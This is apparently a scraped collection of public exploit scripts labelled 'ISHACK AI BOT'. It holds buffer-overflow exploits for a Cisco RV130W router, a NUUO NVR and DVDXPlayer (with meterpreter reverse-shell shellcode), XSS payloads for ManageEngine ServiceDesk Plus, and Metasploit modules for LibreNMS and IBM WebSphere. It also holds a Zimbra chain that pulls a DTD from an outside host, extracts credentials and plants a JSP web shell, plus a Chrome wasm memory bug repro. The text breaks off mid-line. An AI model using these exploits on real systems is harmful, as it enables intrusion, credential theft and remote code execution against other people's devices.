ISHACK AI BOT

#!/usr/bin/python # Exploit Title: Cisco RV130W Remote Stack Overflow # Google Dork: n/a # Date: Advisory Published: Feb 2019 # Exploit Author: @0x00string # Vendor Homepage: cisco.com # Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html # Version: 1.0.3.44 and prior # Tested on: 1.0.3.44 # CVE : CVE-2019-1663 # # 0x357fc000 - libc base addr # 0x35849144 - system() addr # # 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr; # 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; # 0x00041308 / 0x3583D308: mov r0, sp; blx r2; # # gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text # [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command] # # curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi' #!/usr/bin/python import requests def banner(): print ''' @0x00string 0000000000000 0000000000000000000 00 00000000000000000000000000000 0000000000000000000000000000000 000000000 0000000000 00000000 0000000000 0000000 000000000000 0000000 000000000000000 000000 000000000 000000 0000000 000000000 000000 000000 000000000 000000 000000 000000000 000000 000000 00000000 000000 000000 000000000 000000 0000000 000000000 0000000 000000 000000000 000000 0000000000000000 0000000 0000000000000 0000000 00000000000 00000000 00000000000 000000000 0000000000000000000000000000000 00000000000000000000000000000 000 0000000000000000000 0000000000000 https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py ''' def main(): banner() command = "ping 192.168.1.100\x00" print ("Sending exploit to execute [" + command + "]\n") rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35" payload = ("Z" * 446) + rop + command url = "https://192.168.1.100:443/login.cgi" data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'} r = requests.post(url, payload=data) if __name__ == "__main__": main()

#!/usr/bin/python # Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow # Google Dork: n/a # Date: Advisory Published: Nov 18 # Exploit Author: @0x00string # Vendor Homepage: nuuo.com # Software Link: https://www.nuuo.com/ProductNode.php?node=2 # Version: 3.9.1 and prior # Tested on: 3.9.1 # CVE : CVE-2018-19864 # # [ leading / ] # [ Padding x 335 ] # [ original value at stack pointer + 158 ] # [ padding x 80 ] # [ address of (pop {r3,lr} ; bx lr) ] # [ system() address ] # [ address of (mov r0,sp ; blx r3) ] # [ command to execute ] def banner(): print ''' @0x00string 0000000000000 0000000000000000000 00 00000000000000000000000000000 0000000000000000000000000000000 000000000 0000000000 00000000 0000000000 0000000 000000000000 0000000 000000000000000 000000 000000000 000000 0000000 000000000 000000 000000 000000000 000000 000000 000000000 000000 000000 00000000 000000 000000 000000000 000000 0000000 000000000 0000000 000000 000000000 000000 0000000000000000 0000000 0000000000000 0000000 00000000000 00000000 00000000000 000000000 0000000000000000000000000000000 00000000000000000000000000000 000 0000000000000000000 0000000000000 https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py ''' def usage (): print ("python script.py <args>\n" " -h, --help: Show this message\n" " -a, --rhost: Target IP address\n" " -b, --rport: Target Port - default 5150\n" " -c, --command: Command to execute\n" "\n" "Example:\n" "python script.py -a 10.10.10.10\n" "python script.py -a 10.10.10.10 -b 1234 -c reboot\n") exit() def main(): rhost = None; rport = "5150"; command = "{/bin/touch,/tmp/hax}" banner() options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help']) for opt, arg in options: if opt in ('-h', '--help'): usage() elif opt in ('-a','--rhost'): rhost = arg; elif opt in ('-b','--rport'): rport = arg; elif opt in ('-c','--command'): command = arg; print ("Sending exploit to execute [" + command + "]\n") buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" + "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " + "http://" + rhost + ":" + rport + "\r\n\r\n" sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(30) sock.connect((target_ip,int(target_port))) sock.send(buf) print ("done\n") if __name__ == "__main__": main()

# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH # Date: 6-3-2019 # Exploit Author: Kevin Randall # Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer # Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer # Version: 5.5 Pro # Tested on: Windows 7 # CVE : N/A #!/usr/bin/python ###########Create Shellcode with MSFVenom############################################################################################### ##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python ######################################################################################################################################## file_name = "payloadofficial.plf" #######################Copy and Paste Shellcode Here!!########################### buf = "" buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b" buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c" buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc" buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc" buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27" buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23" buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a" buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99" buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92" buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f" buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf" buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46" buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad" buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c" buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e" buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7" buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54" buf += "\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf" buf += "\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef" buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80" buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f" buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b" buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78" buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21" buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c" buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2" buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12" buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37" buf += "\x49\x21\x39\x12" ################################################################################# #No Operations# nops = "\x90"*20 shellcode = nops + buf ####Where all the magic happens! :)##################################################################### buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode)) ################################################################################################### plf_file = open(file_name,"w") plf_file.write(buffer) plf_file.close()

# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12538 Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME= PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view

# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12541 Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter. Attack vector: domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions PoC: https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view

# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12542 An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter. Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view

# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do # Date: 2019-06-04 # Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) # Vendor Homepage: https://www.manageengine.com/products/service-desk # Version: Zoho ManageEngine ServiceDesk Plus 9.3 # CVE : CVE-2019-12543 Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter. Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'LibreNMS addhost Command Injection', 'Description' => %q( This module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed to the popen function in capture.inc.php, which can result in execution of arbitrary code. This module requires authentication to LibreNMS first. ), 'License' => MSF_LICENSE, 'Author' => [ 'mhaskar', # Vulnerability discovery and PoC 'Shelby Pace' # Metasploit module ], 'References' => [ [ 'CVE', '2018-20434' ], [ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ], [ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ] ], 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Linux', { 'Platform' => 'unix', 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' } } ] ], 'DisclosureDate' => '2018-12-16', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]), OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]), OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]) ]) end def login login_uri = normalize_uri(target_uri.path, 'login') res = send_request_cgi('method' => 'GET', 'uri' => login_uri) fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200 cookies = res.get_cookies login_res = send_request_cgi( 'method' => 'POST', 'uri' => login_uri, 'cookie' => cookies, 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } ) fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302 cookies = login_res.get_cookies res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookies) fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices') print_status('Successfully logged into LibreNMS. Storing credentials...') store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) login_res.get_cookies end def add_device(cookies) add_uri = normalize_uri(target_uri.path, 'addhost') @hostname = Rex::Text.rand_text_alpha(6...12) comm_payload = "'; #{payload.encoded}#'" res = send_request_cgi( 'method' => 'POST', 'uri' => add_uri, 'cookie' => cookies, 'vars_post' => { 'snmp' => 'on', 'force_add' => 'on', 'snmpver' => 'v2c', 'hostname' => @hostname, 'community' => comm_payload, 'authalgo' => 'MD5', 'cryptoalgo' => 'AES', 'transport' => 'udp', 'port_assoc_mode' => 'ifIndex' } ) fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added') print_good("Successfully added device with hostname #{@hostname}") host_id = res.get_html_document.search('div[@class="alert alert-success"]/a[@href]').text fail_with(Failure::NotFound, "Couldn't retrieve the id for the device") if host_id.empty? host_id = host_id.match(/(\d+)/).nil? ? nil : host_id.match(/(\d+)/) fail_with(Failure::NotFound, 'Failed to retrieve a valid device id') if host_id.nil? host_id end def del_device(id, cookies) del_uri = normalize_uri(target_uri.path, 'delhost') res = send_request_cgi( 'method' => 'POST', 'uri' => del_uri, 'cookie' => cookies, 'vars_post' => { 'id' => id, 'confirm' => 1 } ) print_status('Unsure if device was deleted. No response received') unless res if res.body.include?("Removed device #{@hostname.downcase}") print_good("Successfully deleted device with hostname #{@hostname} and id ##{id}") else print_status('Failed to delete device. Manual deletion may be needed') end end def exploit exp_uri = normalize_uri(target_uri.path, 'ajax_output.php') cookies = login host_id = add_device(cookies) send_request_cgi( 'method' => 'GET', 'uri' => exp_uri, 'cookie' => cookies, 'vars_get' => { 'id' => 'capture', 'format' => 'text', 'type' => 'snmpwalk', 'hostname' => @hostname } ) del_device(host_id, cookies) end end

#coding=utf8 import requests import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) base_url=sys.argv[1] base_url=base_url.rstrip("/") #upload file name and content #modify by k8gege #Connect "shell.jsp" using K8fly CmdShell #Because the CMD parameter is encrypted using Base64(bypass WAF) filename = "shell.jsp" fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>' print(base_url) #dtd file url dtd_url="https://k8gege.github.io/zimbra.dtd" """ <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>"> """ xxe_data = r"""<!DOCTYPE Autodiscover [ <!ENTITY % dtd SYSTEM "{dtd}"> %dtd; %all; ]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema> </Request> </Autodiscover>""".format(dtd=dtd_url) #XXE stage headers = { "Content-Type":"application/xml" } print("[*] Get User Name/Password By XXE ") r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15) #print r.text if 'response schema not available' not in r.text: print("have no xxe") exit() #low_token Stage import re pattern_name = re.compile(r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>") pattern_password = re.compile(r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>") username = pattern_name.findall(r.text)[0][2] password = pattern_password.findall(r.text)[0][2] print(username) print(password) auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Header> <context xmlns="urn:zimbra"> <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/> </context> </soap:Header> <soap:Body> <AuthRequest xmlns="{xmlns}"> <account by="adminName">{username}</account> <password>{password}</password> </AuthRequest> </soap:Body> </soap:Envelope> """ print("[*] Get Low Privilege Auth Token") r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False) pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>") low_priv_token = pattern_auth_token.findall(r.text)[0] #print(low_priv_token) # SSRF+Get Admin_Token Stage headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";" headers["Host"]="foo:7071" print("[*] Get Admin Auth Token By SSRF") r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False) admin_token =pattern_auth_token.findall(r.text)[0] #print("ADMIN_TOKEN:"+admin_token) f = { 'filename1':(None,"whocare",None), 'clientFile':(filename,fileContent,"text/plain"), 'requestId':(None,"12",None), } headers ={ "Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";" } print("[*] Uploading file") r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False) #print(r.text) print("Shell: "+base_url+"/downloads/"+filename) #print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)") print("[*] Request Result:") s = requests.session() r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers) #print(r.text) print("May need cookie:") print(headers['Cookie'])

<!-- VULNERABILITY DETAILS https://cs.chromium.org/chromium/src/v8/src/wasm/wasm-objects.cc?rcl=783343158eb1b147df7e6669f1d03c690c878e21&l=1253 ``` int32_t WasmMemoryObject::Grow(Isolate* isolate, Handle<WasmMemoryObject> memory_object, uint32_t pages) { [...] Handle<JSArrayBuffer> new_buffer; if (old_buffer->is_shared()) { // Adjust protections for the buffer. if (!AdjustBufferPermissions(isolate, old_buffer, new_size)) { return -1; } void* backing_store = old_buffer->backing_store(); if (memory_tracker->IsWasmSharedMemory(backing_store)) { // This memory is shared between different isolates. DCHECK(old_buffer->is_shared()); // Update pending grow state, and trigger a grow interrupt on all the // isolates that share this buffer. memory_tracker->SetPendingUpdateOnGrow(old_buffer, new_size); // Handle interrupts for this isolate so that the instances with this // isolate are updated. isolate->stack_guard()->HandleInterrupts(); // Failure to allocate, or adjust pemissions already handled here, and // updates to instances handled in the interrupt handler safe to return. return static_cast<uint32_t>(old_size / wasm::kWasmPageSize); } // SharedArrayBuffer, but not shared across isolates. Setup a new buffer // with updated permissions and update the instances. new_buffer = wasm::SetupArrayBuffer(isolate, backing_store, new_size, // ***1*** old_buffer->is_external(), SharedFlag::kShared); memory_object->update_instances(isolate, new_buffer); [...] ``` When `Grow` is called on a `WebAssembly.Memory` object that's backed by a `SharedArrayBuffer`, it uses the buffer's backing store pointer to construct a new array buffer[1]. Calling `Detach` on shared buffers is prohibited by the spec, so the the method just leaves the old one as it is. Thus two array buffers might end up owning the same backing store, and if one of the them got garbage collected, the other one would point to a freed memory region. Blink's SharedArrayBuffer implementation uses reference-counted backing stores, so v8 should probably implement something similar. VERSION Google Chrome 73.0.3683.103 (Official Build) (64-bit) (cohort: Stable) Chromium 75.0.3758.0 (Developer Build) (64-bit) This bug affects the stable branch due to the currently active "WebAssembly Threads" Origin Trial. https://developers.chrome.com/origintrials/#/view_trial/-5026017184145473535 REPRODUCTION CASE --> <script> function gc() { for (let i = 0; i < 50; ++i) { let buffer = new ArrayBuffer(1024 * 1024); } } setInterval(() => { memory = new WebAssembly.Memory({initial: 1, maximum: 2, shared: true}); memory.grow(1); gc(); array = new Int8Array(memory.buffer); array[0x1337] = 1; }); </script> <!-- CREDIT INFORMATION Sergei Glazunov of Google Project Zero -->

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution', 'Description' => %( This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells. NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset. ), 'License' => MSF_LICENSE, 'Author' => [ 'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author ], 'References' => [ ['CVE', '2019-8352'], ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628'] ], 'Platform' => ['win'], 'Targets' => [ [ 'Windows Binary', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win' } ], [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'win', 'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}} } ] ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'May 15 2019')) register_options( [ Opt::RPORT(11006), # 11002,11004,11006,etc OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']), OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']), OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL']) ] ) end def cleanup disconnect print_status('Disconnected from IBM Websphere DMGR.') super end def exploit command = nil if target.name == 'CMD' fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD'] command = datastore['CMD'] end # Connect to IBM Websphere Application Server connect print_status("Connected to IBM WAS DMGR.") node_port = datastore['RPORT'] # Send packet to add neighbor enc_stream = construct_tcp_node_msg(node_port) send_msg(enc_stream) sock.get_once print_status('Server responded') # Generate binary name bin_name = rand_text_alpha(8) if command command = datastore['CMD'] payload_contents = command.to_s print_status('Executing command: ' + payload_contents) bin_name << ".bat" else payload_contents = generate_payload_exe(code: payload.generate) bin_name << ".exe" end print_status("Sending payload: #{bin_name}") enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name) send_msg(enc_stream) register_file_for_cleanup(bin_name) end def send_msg(enc_stream) pkt = [0x396fb74a].pack('N') pkt += [enc_stream.length + 1].pack('N') pkt += "\x00" pkt += enc_stream # Send msg sock.put(pkt) end def construct_tcp_node_msg(node_port) p2p_obj = Rex::Java::Serialization::Model::NewObject.new p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj) # Create the obj object = Rex::Java::Serialization::Model::NewObject.new object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj) # Create the stream and add the object stream = Rex::Java::Serialization::Model::Stream.new stream.contents = [] stream.contents << object stream.contents << Rex::Java::Serialization::Model::EndBlockData.new stream.contents << Rex::Java::Serialization::Model::NullReference.new stream.encode end def construct_bcast_task_msg(node_port, filename, byte_str, cmd) # Add upload file argument byte_arr = byte_str.unpack("C*") upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd) # Create the obj object = Rex::Java::Serialization::Model::NewObject.new object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj) # Create the stream and add the object stream = Rex::Java::Serialization::Model::Stream.new stream.contents = [] stream.contents << object stream.encode end def build_message(obj, msg_id, msg_type, orig_cell_field_type) # Create the integer field and add the reference id_field = Rex::Java::Serialization::Model::Field.new id_field.type = 'int' id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID') # Create the integer field and add the reference type_field = Rex::Java::Serialization::Model::Field.new type_field.type = 'int' type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type') # Create the object field and add the reference new_field = Rex::Java::Serialization::Model::Field.new new_field.type = 'object' new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell') new_field.field_type = orig_cell_field_type # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << id_field msg_class_desc.fields << type_field msg_class_desc.fields << new_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new # Set the member values obj.class_data << ['int', msg_id] obj.class_data << ['int', msg_type] obj.class_data << Rex::Java::Serialization::Model::NullReference.new msg_class_desc end def build_bcast_flood_msg(obj, msg_type, source_ip, source_port) prng = Random.new msg_id = prng.rand(4294967295) # Create the field ref field_ref = Rex::Java::Serialization::Model::Reference.new field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1 msg_obj = build_message(obj, msg_id, msg_type, field_ref) # Create the integer field and add the reference id_field = Rex::Java::Serialization::Model::Field.new id_field.type = 'int' id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID') # Create the integer field and add the reference port_field = Rex::Java::Serialization::Model::Field.new port_field.type = 'int' port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort') # Create the object field and add the reference ip_arr_field = Rex::Java::Serialization::Model::Field.new ip_arr_field.type = 'array' ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP') ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B') # Create the class description msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg') msg_class_desc.serial_version = 1 msg_class_desc.flags = 2 msg_class_desc.fields = [] msg_class_desc.fields << id_field msg_class_desc.fields << port_field msg_class_desc.fields << ip_arr_field # Add annotations msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] # Add superclass msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new msg_class_desc.super_class.description = msg_obj # Construct IP Array ip_arr = source_ip.split(".").map(&:to_i) builder = Rex::Java::Serialization::Builder.new values_array = builder.new_array( values_type: 'byte', values: ip_arr, name: '[B', serial: 0x42acf317f8060854e0, annotations: [Rex::Java::Serialization::Model::EndBlockData.new] ) # Set the member values obj.class_data << ['int', msg_id] obj.class_data << ['int', source_port] obj.class_data << values_array msg_class_desc end def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj) prng = Random.new msg_id = prng.rand(4294967295) # Create the field type for the origCell field_type = 